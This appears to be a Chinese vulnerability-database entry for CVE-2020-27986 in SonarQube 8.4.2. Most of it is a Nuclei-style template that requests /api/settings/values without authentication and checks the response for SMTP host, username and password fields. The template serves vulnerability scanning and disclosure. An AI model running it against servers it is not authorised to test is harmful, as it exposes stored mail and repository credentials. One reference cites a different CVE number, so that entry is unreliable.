CVE-2020-27986: SonarQube - Authentication Bypass

日期: 2025-08-01 | 影响软件: SonarQube | POC: 已公开

漏洞描述

SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI.

PoC代码[已公开]

id: CVE-2020-27986

info:
  name: SonarQube - Authentication Bypass
  author: pikpikcu
  severity: high
  description: |
    SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
    SVN, and GitLab credentials via the api/settings/values URI.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to sensitive information.
  remediation: Reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
  reference:
    - https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-27866
    - https://github.com/SexyBeast233/SecBooks
    - https://github.com/SouthWind0/southwind0.github.io
    - https://github.com/Z0fhack/Goby_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-27986
    cwe-id: CWE-306
    epss-score: 0.91536
    epss-percentile: 0.9966
    cpe: cpe:2.3:a:sonarsource:sonarqube:8.4.2.36762:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sonarsource
    product: sonarqube
  tags: cve,cve2020,sonarqube,sonarsource

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/settings/values"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - email.smtp_host.secured
          - email.smtp_password.secured
          - email.smtp_port.secured
          - email.smtp_username.secured
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206041e7fb9cb7e77f2d51527fb30e61b2da62f990dbbdb519aac049a8ba5c4f52022100eac4d7378e0be27b1cd12e97982ceb300d3350798a277b3fe8fbec87dd6790d5:922c64590222798bb761d5b6d8e72950

相关漏洞推荐